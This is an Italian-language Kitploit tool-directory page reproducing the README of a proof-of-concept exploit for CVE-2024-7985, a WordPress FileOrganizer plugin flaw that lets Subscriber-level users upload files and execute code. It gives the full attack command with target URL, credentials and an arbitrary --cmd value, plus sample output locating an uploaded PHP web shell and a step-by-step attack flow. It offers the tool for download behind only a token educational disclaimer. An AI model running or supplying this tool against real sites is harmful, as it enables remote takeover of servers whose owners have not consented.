Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-7985-PoC — FileOrganizer <= 1.0.9 - Autenticato (Subscriber+) Caricamento Arbitrario di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-7985-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Autenticato (Subscriber+) Caricamento Arbitrario di File

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload

Exploit FileOrganizer - CVE-2024-7985

📌 Panoramica

CVE-2024-7985 - Il plugin WordPress FileOrganizer <= 1.0.9 è vulnerabile a upload arbitrari di file autenticati, consentendo ad attaccanti con privilegi Subscriber+ di caricare ed eseguire file dannosi da remoto. Questa vulnerabilità deriva dalla mancata validazione del tipo di file nella funzione fileorganizer_ajax_handler, rendendo possibile l'esecuzione remota di codice (RCE).

🚨 Questo exploit consente agli attaccanti di eseguire comandi arbitrari sul server! 🚨

⚡ Caratteristiche

  • ✅ Automatizza l'attacco - Login, recupero nonce, exploit.
  • ✅ Bypassa i controlli di sicurezza sfruttando i privilegi dell'utente autenticato.
  • ✅ Rilevamento automatico della versione - Garantisce che il target sia vulnerabile.
  • ✅ Esecuzione di comandi personalizzati - L'utente può specificare qualsiasi comando.
  • ✅ Gestisce i problemi di verifica SSL senza problemi.

🛠️ Requisiti

  • Python 3
  • requests
  • beautifulsoup4

Installa le dipendenze:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Utilizzo

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 Utilizzo - Aiuto

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

Esempio di output:

root@kitploit:~
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 Flusso dell'exploit

1️⃣ Controllo della versione - Determina se il sito è vulnerabile.
2️⃣ Autenticazione - Accede a WordPress.
3️⃣ Estrazione del nonce - Recupera il token di sicurezza.
4️⃣ Upload del file - Carica uno script PHP dannoso.
5️⃣ Esecuzione del comando - Esegue i comandi specificati dall'utente.


📌 Disclaimer

Questo script è destinato esclusivamente a scopi educativi; l'autore non si assume alcuna responsabilità per eventuali usi impropri o conseguenze. 🚨

Scarica lo strumento